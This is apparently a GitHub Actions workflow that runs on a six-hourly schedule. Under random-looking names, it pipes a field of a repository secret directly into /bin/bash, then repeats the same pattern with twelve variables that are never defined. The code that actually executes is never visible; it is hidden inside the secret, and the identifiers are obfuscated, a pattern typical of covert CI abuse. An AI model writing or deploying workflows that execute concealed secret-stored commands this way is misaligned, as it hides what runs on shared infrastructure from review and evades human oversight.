name: zhaoshouyy

on:
  workflow_dispatch:
  schedule:
    - cron: '15 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhaoshouyy
        env:
          kzv24: ${{ secrets.kzv24 }}
        run: |
          echo $kzv24 | jq -r .zeeb77 | /bin/bash
          echo $odua35957 | jq -r .abt728 | /bin/bash
          echo $jr97 | jq -r .ue1133 | /bin/bash
          echo $yasu44 | jq -r .dt7960 | /bin/bash
          echo $e355 | jq -r .rdfo01474 | /bin/bash
          echo $i486 | jq -r .hxhe0 | /bin/bash
          echo $hw30 | jq -r .w3775 | /bin/bash
          echo $u465 | jq -r .vp79 | /bin/bash
          echo $nguis20 | jq -r .ktorr05 | /bin/bash
          echo $mj38 | jq -r .vitgl1 | /bin/bash
          echo $xfjjx2 | jq -r .leg55638 | /bin/bash
          echo $xb19189 | jq -r .ggwke8 | /bin/bash
          echo $u352 | jq -r .dje5452 | /bin/bash

